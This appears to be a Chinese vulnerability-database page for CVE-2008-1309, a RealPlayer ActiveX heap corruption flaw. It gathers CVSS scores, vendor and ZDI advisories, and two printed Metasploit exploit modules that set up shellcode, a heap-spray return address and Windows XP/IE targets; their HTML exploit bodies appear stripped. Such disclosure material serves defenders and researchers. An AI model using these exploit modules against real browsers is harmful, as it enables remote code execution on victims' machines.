微慑信息网

CVE-2008-1309-漏洞详情

CVE-2008-1309
CVSS 9.3
发布时间 :2008-03-12 13:44:00
修订时间 :2017-02-19 00:21:48
NMCOEPS    

[原文]The RealAudioObjects.RealAudio ActiveX control in rmoc3260.dll in RealNetworks RealPlayer Enterprise, RealPlayer 10, RealPlayer 10.5 before build 6.0.12.1675, and RealPlayer 11 before 11.0.3 build 6.0.14.806 does not properly manage memory for the (1) Console or (2) Controls property, which allows remote attackers to execute arbitrary code or cause a denial of service (browser crash) via a series of assignments of long string values, which triggers an overwrite of freed heap memory.


[CNNVD]RealNetworks RealPlayer ‘rmoc3260.dll’ ActiveX控件内存破坏漏洞(CNNVD-200803-201)

        RealPlayer是一款流行的多媒体播放器,支持多种媒体格式。


        RealPlayer的rmoc3260.dll ActiveX控件实现上存在漏洞,远程攻击者可能利用此漏洞控制用户系统。


        rmoc3260.dll ActiveX控件没有正确地处理Console属性的输入参数,如果用户受骗访问了恶意站点的话,就可能触发内存破坏,导致执行任意指令。


        


CVSS (基础分值)

CVSS分值: 9.3 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]


CWE (弱点类目)

CWE-399 [资源管理错误]


CPE (受影响的平台与产品)

cpe:/a:realnetworks:realplayer:11
cpe:/a:realnetworks:realplayer:::enterprise
cpe:/a:realnetworks:realplayer:10.0 RealNetworks RealPlayer 10.0
cpe:/a:realnetworks:realplayer:10.5 RealNetworks RealPlayer 10.5


OVAL (用于检测的技术细节)

未找到相关OVAL定义


官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1309

(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1309

(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200803-201

(官方数据源) CNNVD


其它链接及资源

http://lists.grok.org.uk/pipermail/full-disclosure/2008-March/060659.html


(UNKNOWN)  FULLDISC  20080310 Real Networks RealPlayer ActiveX Control Heap Corruption
http://service.real.com/realplayer/security/07252008_player/en/


(VENDOR_ADVISORY)  CONFIRM  http://service.real.com/realplayer/security/07252008_player/en/
http://www.kb.cert.org/vuls/id/831457


(UNKNOWN)  CERT-VN  VU#831457
http://www.milw0rm.com/exploits/5332


(UNKNOWN)  MILW0RM  5332
http://www.securityfocus.com/archive/1/archive/1/494779/100/0/threaded


(UNKNOWN)  BUGTRAQ  20080725 ZDI-08-047: RealNetworks RealPlayer rmoc3260 ActiveX Control Memory Corruption Vulnerability
http://www.securityfocus.com/bid/28157


(UNKNOWN)  BID  28157
http://www.securitytracker.com/id?1019576


(UNKNOWN)  SECTRACK  1019576
http://www.securitytracker.com/id?1020563


(UNKNOWN)  SECTRACK  1020563
http://www.vupen.com/english/advisories/2008/0842


(VENDOR_ADVISORY)  VUPEN  ADV-2008-0842
http://www.vupen.com/english/advisories/2008/2194/references


(VENDOR_ADVISORY)  VUPEN  ADV-2008-2194
http://www.zerodayinitiative.com/advisories/ZDI-08-047/


(UNKNOWN)  MISC  http://www.zerodayinitiative.com/advisories/ZDI-08-047/
http://xforce.iss.net/xforce/xfdb/41087


(UNKNOWN)  XF  realplayer-realaudioobjects-code-execution(41087)


漏洞信息

RealNetworks RealPlayer ‘rmoc3260.dll’ ActiveX控件内存破坏漏洞
高危 资源管理错误
2008-03-12 00:00:00 2009-03-18 00:00:00
远程  
        RealPlayer是一款流行的多媒体播放器,支持多种媒体格式。


        RealPlayer的rmoc3260.dll ActiveX控件实现上存在漏洞,远程攻击者可能利用此漏洞控制用户系统。


        rmoc3260.dll ActiveX控件没有正确地处理Console属性的输入参数,如果用户受骗访问了恶意站点的话,就可能触发内存破坏,导致执行任意指令。


        


公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:


        http://www.real.com


漏洞信息 (5332)

Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit
(EDBID:5332)
windows remote
2008-04-01 Verified
0 Elazar

N/A

[点击下载]



 
  Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit
  
  
  

 
 
  Unable to create object
 

 


# milw0rm.com [2008-04-01]
  

-
漏洞信息 (16584)

RealPlayer rmoc3260.dll ActiveX Control Heap Corruption (EDBID:16584)
windows remote
2010-06-15 Verified
0 metasploit

N/A

[点击下载]

##
# $Id: realplayer_console.rb 9525 2010-06-15 07:18:08Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::Remote::HttpServer::HTML

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'RealPlayer rmoc3260.dll ActiveX Control Heap Corruption',
   'Description'    => %q{
     This module exploits a heap corruption vulnerability in the RealPlayer ActiveX control.
    By sending a specially crafted string to the 'Console' property
    in the rmoc3260.dll control, an attacker may be able to execute
    arbitrary code.
   },
   'License'        => MSF_LICENSE,
   'Author'         => [ 'Elazar Broad ' ],
   'Version'        => '$Revision: 9525 $',
   'References'     =>
    [
     [ 'CVE', '2008-1309' ],
     [ 'OSVDB', '42946' ],
     [ 'BID', '28157' ],
     [ 'URL', 'http://secunia.com/advisories/29315/' ],
    ],
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'process',
    },
   'Payload'        =>
    {
     'Space'         => 1024,
     'BadChars'      => "\x00\x09\x0a\x0d'\\",
     'StackAdjustment' => -3500,
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0 English', { 'Offset' => 32, 'Ret' => 0x0C0C0C0C } ]
    ],
   'DisclosureDate' => 'Mar 8 2008',
   'DefaultTarget'  => 0))
 end

 def autofilter
  false
 end

 def check_dependencies
  use_zlib
 end

 def on_request_uri(cli, request)
  # Re-generate the payload
  return if ((p = regenerate_payload(cli)) == nil)

  # Encode the shellcode
  shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

  # Setup exploit buffers
  nops    = Rex::Text.to_unescape([target.ret].pack('V'))
  ret     = Rex::Text.uri_encode([target.ret].pack('L'))
  blocksize = 0x40000
  fillto    = 400
  offset    = target['Offset']

  # Randomize the javascript variable names
  racontrol    = rand_text_alpha(rand(100) + 1)
  j_shellcode  = rand_text_alpha(rand(100) + 1)
  j_nops       = rand_text_alpha(rand(100) + 1)
  j_headersize = rand_text_alpha(rand(100) + 1)
  j_slackspace = rand_text_alpha(rand(100) + 1)
  j_fillblock  = rand_text_alpha(rand(100) + 1)
  j_block      = rand_text_alpha(rand(100) + 1)
  j_memory     = rand_text_alpha(rand(100) + 1)
  j_counter    = rand_text_alpha(rand(30) + 2)
  j_ret        = rand_text_alpha(rand(100) + 1)

  # Build out the message
  content = %Q|



|

  print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

  # Transmit the response to the client
  send_response_html(cli, content)

  # Handle the payload
  handler(cli)
 end

end
  

-
漏洞信息 (F68526)

Zero Day Initiative Advisory 08-047 (PacketStormID:F68526)

2008-07-26 00:00:00
Peter Vreugdenhil,Tipping Point  zerodayinitiative.com

advisory,remote,web,code execution,activex

CVE-2008-1309

[点击下载]

A vulnerability allows remote attackers to execute code on vulnerable installations of RealPlayer. User interaction is required in that a user must visit a malicious web site. The specific flaw exists in the rmoc3260 ActiveX control. Specifying malicious values for the 'Controls' or 'Console' properties with a specific timing results in a memory corruption which can lead to code execution under the context of the current user.

ZDI-08-047: RealNetworks RealPlayer rmoc3260 ActiveX Control Memory 
Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-047
July 25, 2008

-- CVE ID:
CVE-2008-1309

-- Affected Vendors:
RealNetworks

-- Affected Products:
RealNetworks RealPlayer

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 5834. 
For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute code on vulnerable
installations of RealPlayer. User interaction is required in that a user
must visit a malicious web site.

The specific flaw exists in the rmoc3260 ActiveX control exposed through
the following CLSIDs:

    CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA
    0FDF6D6B-D672-463B-846E-C6FF49109662
    224E833B-2CC6-42D9-AE39-90B6A38A4FA2
    2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93
    3B46067C-FD87-49B6-8DDD-12F0D687035F
    3B5E0503-DE28-4BE8-919C-76E0E894A3C2
    44CCBCEB-BA7E-4C99-A078-9F683832D493
    A1A41E11-91DB-4461-95CD-0C02327FD934
    CFCDA953-8BE4-11CF-B84B-0020AFBBCCFA

Specifying malicious values for the 'Controls' or 'Console' properties
with a specific timing results in a memory corruption which can lead to
code execution under the context of the current user.

-- Vendor Response:
RealNetworks has issued an update to correct this vulnerability. More
details can be found at:

http://service.real.com/realplayer/security/07252008_player/en/

-- Disclosure Timeline:
2008-02-07 - Vulnerability reported to vendor
2008-07-25 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Peter Vreugdenhil

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at [email protected] 
    

-
漏洞信息 (F65090)

realplayer_console.rb.txt (PacketStormID:F65090)

2008-04-02 00:00:00
Elazar Broad  

exploit,arbitrary,activex

CVE-2008-1309

[点击下载]

This Metasploit module exploits a heap corruption vulnerability in the RealPlayer ActiveX control. By sending a specially crafted string to the 'Console' property in the rmoc3260.dll control, an attacker may be able to execute arbitrary code.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

module Msf

class Exploits::Windows::Browser::RealPlayer_Console < Msf::Exploit::Remote

 include Exploit::Remote::HttpServer::HTML

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'RealPlayer rmoc3260.dll ActiveX Control Heap Corruption',
   'Description'    => %q{
     This module exploits a heap corruption vulnerability in the RealPlayer ActiveX control. 
     By sending a specially crafted string to the 'Console' property 
     in the rmoc3260.dll control, an attacker may be able to execute 
     arbitrary code.
   },
   'License'        => MSF_LICENSE,
   'Author'         => [ 'Elazar Broad ' ], 
   'Version'        => '$Revision: 0 $',
   'References'     => 
    [
     [ 'CVE', 'CVE-2008-1309' ],
     [ 'BID', '28157' ],
     [ 'URL', 'http://secunia.com/advisories/29315/' ],
    ],
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'process',
    },
   'Payload'        =>
    {
     'Space'         => 1024,
     'BadChars'      => "\x00\x09\x0a\x0d'\\", 
     'PrepenEncoder' => "\x81\xc4\x54\xf2\xff\xff", 
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [ 'Windows XP SP0-SP2 / IE 6.0 SP0-2 & IE 7.0 English', { 'Offset' => 32, 'Ret' => 0x0C0C0C0C } ] 
    ],
   'DisclosureDate' => 'March 8 2008',
   'DefaultTarget'  => 0))
 end

 def autofilter
  false
 end

 def check_dependencies
  use_zlib
 end

 def on_request_uri(cli, request)
  # Re-generate the payload
  return if ((p = regenerate_payload(cli)) == nil)

  # Encode the shellcode
  shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

  # Setup exploit buffers
  nops    = Rex::Text.to_unescape([target.ret].pack('V'))
  ret     = Rex::Text.uri_encode([target.ret].pack('L'))
  blocksize = 0x40000
  fillto    = 400 
  offset    = target['Offset']
 
  # Randomize the javascript variable names
  racontrol    = rand_text_alpha(rand(100) + 1)
   j_shellcode  = rand_text_alpha(rand(100) + 1)
  j_nops       = rand_text_alpha(rand(100) + 1)
  j_headersize = rand_text_alpha(rand(100) + 1)
  j_slackspace = rand_text_alpha(rand(100) + 1)
  j_fillblock  = rand_text_alpha(rand(100) + 1)
  j_block      = rand_text_alpha(rand(100) + 1)
  j_memory     = rand_text_alpha(rand(100) + 1)
  j_counter    = rand_text_alpha(rand(30) + 2)
  j_ret        = rand_text_alpha(rand(100) + 1)
  j_m      = rand_text_alpha(rand(100) + 1) 

  # Build out the message
  content = %Q|
   
    
     
    
   |

  
 
  print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

  # Transmit the response to the client
  send_response_html(cli, content)
  
  # Handle the payload
  handler(cli)
 end

end
end
    

-
漏洞信息 (F65089)

realplayer-activexexec.txt (PacketStormID:F65089)

2008-04-02 00:00:00
Elazar Broad  

exploit,arbitrary,activex

CVE-2008-1309

[点击下载]

Exploit for the heap corruption vulnerability in the RealPlayer ActiveX control. By sending a specially crafted string to the 'Console' property in the rmoc3260.dll control, an attacker may be able to execute arbitrary code.



 
  Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit
  
  
  

 
 
  Unable to create object
 

 

    

-
漏洞信息


42946
RealPlayer ActiveX (rmoc3260.dll) Console Property Memory Corruption Arbitrary Code Execution

Remote / Network Access,
Context Dependent

Input Manipulation
Loss of Integrity Workaround,
Patch / RCS
Exploit Public,
Exploit Private,
Exploit Commercial
Vendor Verified

-
漏洞描述

A use-after-free condition exists in RealPlayer. By setting properties in rmoc3260.dll ActiveX control in a certain way, it is possible to overwrite heap management structures, resulting in redirection of execution flow when these corrupted heap blocks are freed. This issue can be exploited by a context-dependent attacker to execute arbitrary code in the context of the user running the host application, typically Internet Explorer.

-
时间线


2008-03-10

2008-03-10
2008-04-01 2008-07-25

-
解决方案

RealNetworks has released a patch to address this issue. Additionally, it is possible to correct the flaw by implementing the following workaround(s): set the killbit for the affected control.

-
相关参考

-
漏洞作者

-
漏洞信息

RealNetworks RealPlayer 'rmoc3260.dll' ActiveX Control Memory Corruption Vulnerability

Boundary Condition Error

28157
Yes No
2008-03-10 12:00:00 2008-07-28 05:47:00

Elazar Broad and Peter Vreugdenhil.

-
受影响的程序版本

Real Networks rmoc3260.dll 6.0.10 .45

Real Networks RealPlayer Enterprise

Real Networks RealPlayer 11.0.2

Real Networks RealPlayer 10.5 v6.0.12.1483

Real Networks RealPlayer 10.5 v6.0.12.1483

Real Networks RealPlayer 10.5 v6.0.12.1348

Real Networks RealPlayer 10.5 v6.0.12.1235

Real Networks RealPlayer 10.5 v6.0.12.1069

Real Networks RealPlayer 10.5 v6.0.12.1059

Real Networks RealPlayer 10.5 v6.0.12.1056

Real Networks RealPlayer 10.5 v6.0.12.1053

Real Networks RealPlayer 10.5 v6.0.12.1040

Real Networks RealPlayer 10.5 Beta v6.0.12.1016

Real Networks RealPlayer 10.5

Real Networks RealPlayer 10.0

+

S.u.S.E. cvsup-16.1h-43.i586.rpm


+

S.u.S.E. Linux Personal 9.3


+

S.u.S.E. Linux Personal 9.2


Real Networks RealPlayer 11

Real Networks rmoc3260.dll 6.0.10 .50

Real Networks RealPlayer 11.0.3

Real Networks RealPlayer 10.5 v6.0.12.1675

-
不受影响的程序版本

Real Networks rmoc3260.dll 6.0.10 .50

Real Networks RealPlayer 11.0.3

Real Networks RealPlayer 10.5 v6.0.12.1675

-
漏洞讨论

RealNetworks RealPlayer 'rmoc3260.dll' ActiveX control is prone to a memory-corruption vulnerability.



Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the affected ActiveX control. Failed exploit attempts will likely crash the application.

-
漏洞利用

An attacker can exploit this issue by enticing an unsuspecting victim to view a malicious HTML page.



UPDATE (April 3, 2008): This issue is being actively exploited in the wild.



Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.



The following proof of concept and exploit code are available:

-
解决方案

The vendor addressed this issue in RealPlayer 11.0.3. Please contact the vendor for details.



-
相关参考

本文标题:CVE-2008-1309-漏洞详情
本文链接:
(转载请附上本文链接)
http://vulsee.com/archives/vulsee_2019/0713_2949.html
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » CVE-2008-1309-漏洞详情
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

微慑信息网 专注工匠精神

访问我们联系我们